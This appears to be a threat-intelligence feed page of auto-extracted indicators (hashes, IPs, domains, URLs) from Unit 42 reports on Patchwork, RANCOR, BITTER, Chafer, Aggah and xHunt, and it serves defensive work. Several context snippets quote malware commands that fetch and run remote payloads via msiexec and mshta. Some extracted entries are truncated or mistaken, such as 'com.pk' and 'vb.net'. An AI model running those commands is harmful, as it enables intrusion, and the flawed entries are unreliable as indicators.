ZeroHour

Indicators of compromise

4,114 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
sha256290ac98de80154705794e96d0c6d657c948b7dff7abf25ea817585e4c923adb2research blog, we are discussing the following file: SHA256 290ac98de80154705794e96d0c6d657c948b7dff7abf25ea817585e4c923adb2 MD5 79ad2084b057847ce2ec2e48fda64073 Compile Date 2017-12-2Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
sha256a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1n be seen in the images below: Figure 1 Lure extracted from a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1 Figure 2 Lure extracted from 07d5509988b1aa6f8d5203bc4b75e6Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
sha256ab4f86a3144642346a3a40e500ace71badc06a962758522ca13801b40e9e7f4a67e92b49169c24051ee9de41327ee5e6ac7c2 BADNEWS SHA256 Hashes ab4f86a3144642346a3a40e500ace71badc06a962758522ca13801b40e9e7f4a 290ac98de80154705794e96d0c6d657c948b7dff7abf25ea817585e4c92Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
sha256b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a5716acf5055831cc961a51d3e921f96bd Figure 3 Lure extracted from b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267ePatchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
sha256d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c27e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b4Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
sha256fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 The payload from each of the malicious documents is an updaPatchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
urlhttp://feed43[rvers 185.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
urlhttp://feeds.rapidfeeds[622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com/88604/ Script to Decrypt Dead Drop Resolvers 1 2 3 4 5Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
urlhttp://www.webrss[66706728852850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
domainfacebook-apps.comt mimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware samples associatedRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
domainjdanief.xyzject ( "WScript.Shell" ) . Run "msiexec /q /i http:\\dlj40s.jdanief[.]xyz/images/word3.doc" , 0 > % userProfile % \ AppData \ LocalRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
ipv4199.247.6.253ct ( ^ "Wscript.Shell^" ) : v . Run ^ "msiexec /q /i http://199.247.6.253/ud^" , false , 0 < nul > C : \ Windows \ System32 \ spool \RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
ipv489.46.222.9790fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca47RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
md56fa5bcedaf124cdaccfa5548eed7f4b04d92bc7d0 SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a MD5 6fa5bcedaf124cdaccfa5548eed7f4b0 Compile Time 2018-03-14 07:20:11 UTC File Type PE32 executaRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
md57c65565dcf5b40bd8358472d032bc8fb32e38ae78 SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e MD5 7c65565dcf5b40bd8358472d032bc8fb Compile Time 2017-09-25 00:54:18 UTC File Type PE32 executaRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
md5a5164c686c405734b7362bc6b02488cbf9c154ad7 SHA1 03defdda9397e7536cf39951246483a0339ccd35 MD5 a5164c686c405734b7362bc6b02488cb Compile Time 2018-03-28 01:54:40 UTC File Type PE32 executaRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
md5d5679158937ce288837efe62bc1d9693a473c505d SHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9 MD5 d5679158937ce288837efe62bc1d9693 Compile Time 2018-04-02 07:57:38 UTC File Type PE32 executaRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha103defdda9397e7536cf39951246483a0339ccd35c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7 SHA1 03defdda9397e7536cf39951246483a0339ccd35 MD5 a5164c686c405734b7362bc6b02488cb Compile Time 2018-03-2RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha10bdb44255e9472d80ee0197d0bfad7d8eb4a18e96239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d SHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9 MD5 d5679158937ce288837efe62bc1d9693 Compile Time 2018-04-0RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha125ba920cb440b4a1c127c8eb0fb23ee783c9e01a502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a MD5 6fa5bcedaf124cdaccfa5548eed7f4b0 Compile Time 2018-03-1RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha1ac3f20ddc2567af0b050c672ecd59dddab1fe55e947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e MD5 7c65565dcf5b40bd8358472d032bc8fb Compile Time 2017-09-2RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha2560517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7During runtime, the following plugin was identified: SHA256 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7 SHA1 03defdda9397e7536cf39951246483a0339ccd35 MD5 a5164c686RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha2560bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855ted to this IP address: SHA256 Description Connection to IP 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c356RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha256119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0For the analysis below, we used the following file: SHA256 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a MD5 6fa5bcedaRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha2561dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458o 2 / RU SYSTEM Cluster B Case 2: Delivery via HTA Loader - 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458 In this case the attackers sent an HTML Application file (.RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha2566aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31,helloworld2,sqmAddTostream,DllEntryPoint microsoftfuckedup 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 The following actions are performed with the additional funRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha256a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483w. Cluster A Case 1: Delivery via document property macro – a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 In our research we found at least one attack against a compRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha256b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78or that sample. The retrieved plugin was as follows: SHA256 b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e MD5 7c65565dcRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha256bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039ees have additional unique differences: Hash Functions Mutex bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e helloworld helloworld1,helloworld2,sqmAddTostream,DllEntryPRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
sha256c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505dd855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d PLAINTEE Hosted on 89.46.222.97 Digging in further, the malRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
domainbookreader.bituse them. This new sample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS ServeUpatre Continued to Evolve with new Anti
Palo Alto Unit 42
· Aug 17, 2026
domaindoghunter.bitample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Servers: 31.3.135[.]232 1Upatre Continued to Evolve with new Anti
Palo Alto Unit 42
· Aug 17, 2026
sha2568ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4omise associated with this analysis include: Upatre SHA256: 8ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4 Cthonic SHA256: 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01Upatre Continued to Evolve with new Anti
Palo Alto Unit 42
· Aug 17, 2026
sha25694a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83ample configured with the same dot-bit domains. The sample, 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83, was compiled six days after our Upatre sample and delivereUpatre Continued to Evolve with new Anti
Palo Alto Unit 42
· Aug 17, 2026
domainalmasoodgroup.comry 2019, an engineering and hydraulics company in Pakistan, almasoodgroup[.]com was observed hosting two AtraDownloader executables as weMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainaroundtheworld123.netnhexlify("6E7F7C827B71817572847C7F79713E3F403B7B7281"))) >> aroundtheworld123[.]net The malware proceeds to check to determine if the AVG secMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaincom.pkich had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[.]coMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaincyberthreatalliance.orgs. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org. Appendix ArtraDownloader Malware Analysis – Variant 1 ForMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainframeworksupport.netxFF) return out >> print(decode(“iudphzrunvxssruw1qhw”)) >> frameworksupport[.]net It proceeds to attempt to create the C:\intel\ directory,Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaingov.pkember 17 and 18 2018, a file was downloaded from http://fst.gov[.]pk/images/winsvc (SHA256: ef0cb0a1…) after a user accessed tMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainkhurram.combles, which had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[.Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainkielsoservice.netmmunicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots Metropolitan Model United Nations, is aMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainnethosttalk.comn Saudi Arabia. The malicious file communicated with the C2 nethosttalk[.]com. Around the same timeframe, two additional files (listedMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainnsiagenthoster.netom/js/cwqj and communicated with C2 domain thepandaservices.nsiagenthoster[.]net. The domain almasoodgroup[.]com appears to be a legitimatMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainorg.pkop.pdf[.]com Beginning on Nov 6, 2018, the URL http://rmmun.org[.]pk/svch was observed hosting two ArtraDownloader files thatMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainpdf.comthe domain nethosttalk[.]com for C2. Handling of Logistics.pdf[.]com Cyber security work shop.pdf[.]com Beginning on Nov 6, 20Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainviewworld71.comtraDownloader files that communicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots MetropolitMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainwforc.pked files with the following names hosted on the URL https://wforc[.]pk/js/. Internet Data Traffic Report – August 2018.docx PAFMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainxiovo426.netmpany’s domain communicated with command and control domain xiovo426[.]net. On 2 Jan 19, the file article_amy.doc was also uploadedMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainzmwardrobe.comon malicious documents that were downloaded from the domain zmwardrobe[.]com and subsequently executed a payload referred to as MY24.Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
md57cc0b212d1b8ceb808c250495d83bae4remainder of the analysis, the following file is used: MD5 7cc0b212d1b8ceb808c250495d83bae4 SHA1 d2c161ce52240b61d632607a2262890327d82502 SHA256 ef0cb0Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
md58d42c01180be7588a2a68ad96dd0cf85remainder of the analysis, the following file is used: MD5 8d42c01180be7588a2a68ad96dd0cf85 SHA1 89a7861acb7983ad712ae9206131c96454a1b3d8 SHA256 0b2a79Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
md5a1bdb1889d960e424920e57366662a59remainder of the analysis, the following file is used: MD5 a1bdb1889d960e424920e57366662a59 SHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 SHA256 f0ef42Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
sha1177837d0fa5bfd274abe79d80a01cfe2374b4cd9ing file is used: MD5 a1bdb1889d960e424920e57366662a59 SHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 SHA256 f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbcaMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
sha189a7861acb7983ad712ae9206131c96454a1b3d8ing file is used: MD5 8d42c01180be7588a2a68ad96dd0cf85 SHA1 89a7861acb7983ad712ae9206131c96454a1b3d8 SHA256 0b2a794bac4bf650b6ba537137504162520b67266449be979679Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
sha1d2c161ce52240b61d632607a2262890327d82502ing file is used: MD5 7cc0b212d1b8ceb808c250495d83bae4 SHA1 d2c161ce52240b61d632607a2262890327d82502 SHA256 ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd9Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
sha2560b2a794bac4bf650b6ba537137504162520b67266449be979679afbb14e8e5c0d0cf85 SHA1 89a7861acb7983ad712ae9206131c96454a1b3d8 SHA256 0b2a794bac4bf650b6ba537137504162520b67266449be979679afbb14e8e5c0 Compile Timestamp 2019-01-07 07:13:47 UTC PDB String c:\UseMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
sha256ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd5783bae4 SHA1 d2c161ce52240b61d632607a2262890327d82502 SHA256 ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57 Compile Timestamp 2018-12-06 11:14:45 UTC Table 1 ArtraDownMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
sha256f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22662a59 SHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9 SHA256 f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22 Compile Timestamp 2018-07-30 09:18:37 UTC PDB String d:\C++Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaineseses.tkri[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tkNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainturkiyeburslari.gov.trirrors the legitimate Turkish Scholarship government domain turkiyeburslari[.]gov[.]tr, also resolved to this IP and may likely have been usedNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainturkiyeburslari.tkly associated with Chafer activity. Of interest, the domain turkiyeburslari[.]tk, which mirrors the legitimate Turkish Scholarship governmNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainwin10-update.comrted earlier in 2018 by Clearsky , specifically, the domain win10-update[.]com. While we lack visibility into the initial delivery mechaNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainwin7-update.comreport win10-update[.]com 185.177.59[.]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com)New Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainxn--mgbfv9eh74d.com]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tkNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainytb.servicesm turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tkNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
sha2560282b7705f13f9d9811b722f8d7ef8fef907bee2ef00bf8ec89df5e7d96d81ff[.]com/update.php?req=<redacted>&m=d This payload, (SHA256: 0282b7705f13f9d9811b722f8d7ef8fef907bee2ef00bf8ec89df5e7d96d81ff), which we are tracking as MechaFlounder, was developed inNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
sha2561b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1hows a VBScript run by an OilRig delivery document (SHA256: 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1) on the left compared to a Chafer AutoIT script (SHA256: 33New Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
sha256332fab21cb0f2f50774fccf94fc7ae905a21b37fe66010dcef6b71c140bb7fa1e1) on the left compared to a Chafer AutoIT script (SHA256: 332fab21cb0f2f50774fccf94fc7ae905a21b37fe66010dcef6b71c140bb7fa1) on the right, which have colored boxes surrounding code ovNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainbitly.comthe following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta” aAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainblogspot.comalysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTTP rAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainduckdns.orgult in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2. During our research, we found several relaAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainpastebin.comding of a portable executable hosted on Pastebin at https://pastebin[.]com/raw/2LDaeHE1 , decoding the base64 downloaded from the URAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainvb.netrom pastebin[.]com/raw/2LDaeHE1 This payload was written in VB.NET and named "Nuclear Explosion," which is a variant of RevengAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainwixstatic.comattempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : FigureAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
sha2565f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6footer of Activity.doc file is actually an RTF file (SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f ) that loads an embedded Excel document with a heavily obfuAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
sha256d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946document attached with the filename “Activity.doc” (SHA256: d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946 ) that attempted to load a remote OLE document via TemplateAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
urlhttps://bjm9.blogspot[WildFire's analysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTTAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
urlhttps://pastebin[n to download a script from a Pastebin URL, specifically at hxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as theAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
urlhttps://static.wixstatic[t’s footer that attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : FiguAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
urlhttp://www.bitly[nd execute the following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshtaAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domain6google.com2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainalforatsystem.com/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domaincheck-updates.com- 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27/18 Masked check-updates[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com travelexHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainfirewallsupports.comlation to pasta58[.]com : Domain Date Registered Registrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainmail.contoso.coming, we were able to enable the C2 channel: hisoka;pass123!;mail.contoso.com;2010 To initiate communications, Hisoka notifies the actorxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainmicrosoft-check.com18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 - 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainmicrosofte-update.comven Hisoka v0.8 samples configured to beacon to the domains microsofte-update[.]com . Each of these samples also contain the following debugxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainpasta58.coma samples -- all of which were configured to use the domain pasta58[.]com for its C2 server. During general infrastructure analysisxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainsakabota.comdomain registration details, we also identified the domain sakabota[.]com whose web server served a page with the title “Outlook WexHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domaintraveleasy-kw.comtes[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com traveleasy-kw[.]com 6/13/18 - 6/13/19 Masked Table 1. Domains associated withxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainwindows64x.com7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 -xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainwindows-updates.com- 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 -xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainwinx64-microsoft.comegistrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
sha256892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4soka\\Hisoka\\obj\\Debug\\inetinfo.sys.pdb The file SHA256: 892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4 was used in reference to the below analysis on Hisoka v0.8.xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
